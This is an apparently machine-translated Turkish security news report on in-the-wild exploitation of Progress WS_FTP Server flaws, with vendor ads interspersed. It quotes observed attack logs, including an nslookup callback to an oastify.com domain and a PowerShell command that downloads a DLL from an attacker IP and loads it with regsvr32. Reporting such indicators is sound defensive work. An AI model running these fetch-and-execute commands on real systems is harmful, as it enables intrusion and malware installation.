Ortalıkta Tespit Edilen Kritik WS_FTP Sunucu Kusurunun İstismarı


Daha önce bildirildiği gibi, Progress’e ait WS_FTP’de, siteler arası komut dosyası çalıştırma (XSS), SQL enjeksiyonu, siteler arası istek sahteciliği, kimliği doğrulanmamış kullanıcı numaralandırma ve diğer birkaç güvenlik açığıyla ilişkili birden fazla güvenlik açığı keşfedildi.

Progress, kullanıcılarını WS_FTP güvenlik açıkları konusunda uyardı ve WS_FTP sunucusunun sabit sürümünden bahseden bir güvenlik tavsiyesi yayınladı. Ayrıca kullanıcılarından en son sürüme geçmelerini de talep ettiler.

Doğada İstismar Edilen Güvenlik Açıkları

Cyber ​​Security News ile paylaşılan raporlara göre, bu güvenlik açıklarının ortadaki tehdit aktörleri tarafından istismar edildiği ortaya çıktı. Daha fazla araştırma yapıldığında, istismar yürütme zincirinin gözlemlenen tüm örneklerde aynı olduğu bulundu.

Belge

Ücretsiz demo

Yapay Zeka Destekli E-posta güvenlik çözümlerini uygulamak “Trustifi”, işletmenizi E-posta İzleme, Engelleme, Değiştirme, Kimlik Avı, Hesabın Devralınması, İş E-postasının Tehlikeye Atılması, Kötü Amaçlı Yazılım ve Fidye Yazılımı gibi günümüzün en tehlikeli e-posta tehditlerine karşı koruyabilir

Bunun, savunmasız WS_FTP sunucularının kitlesel olarak istismar edildiği anlamına gelebileceğinden de bahsedildi. Toplanan günlükler ayrıca kaydedilen tüm olaylara ilişkin belirli bir geğirme paketi alanından oluşuyordu; bu da toplu istismarı tek bir tehdit aktörünün gerçekleştirdiği anlamına geliyor.

Ancak komutların tüm yürütme zinciri aşağıda listelenmiştir.

Büyük-büyük-büyük-büyükbaba Süreci:

C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipm18823d36-4194-409a-805b-cea0f4389a0c -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Büyükbaba veya Büyükbaba Süreci:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe” /noconfig /fullpaths @”C:\Windows\Microsoft.NET\Framework\v4.0.30319\Geçici ASP.NET Dosyaları\aht\e514712b\ a2ab2de1\ryvjavth.cmdline

Ana Süreç:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\Windows\TEMP\RES6C8F.tmp” “c:\Windows\Microsoft.NET \Framework\v4.0.30319\Geçici ASP.NET Dosyaları\aht\e514712b\a2ab2de1\CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP

Çocuk Süreci:

C:\Windows\System32\cmd.exe” /c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com

Raporlara göre Saldırı zincirinde aşağıdaki komut uygulamaları vardı.

Büyük-büyük-büyük-büyükbaba Süreci:

C:\WINDOWS\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipme6a8a618-bb7f-470c-92e9-58204f6ffcfa -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Büyükbaba veya Büyükbaba Süreci:

C:\Windows\System32\cmd.exe” /c powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Ana Süreç:

powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Çocuk Süreci:

C:\Windows\System32\cmd.exe” /c regsvr32 c:\users\public\NTUSER.dll

Ayrıca Rapid7 tarafından kaydedilen olaylar, azaltımlar ve diğer bilgiler hakkında ayrıntılı bilgi sağlayan eksiksiz bir rapor yayımlandı.

850’den fazla üçüncü taraf uygulamaya hızla yama uygulamak için Patch Manager Plus’ı kullanarak kendinizi güvenlik açıklarından koruyun. Avantajlardan yararlanın ücretsiz deneme % 100 güvenlik sağlamak için.



Source link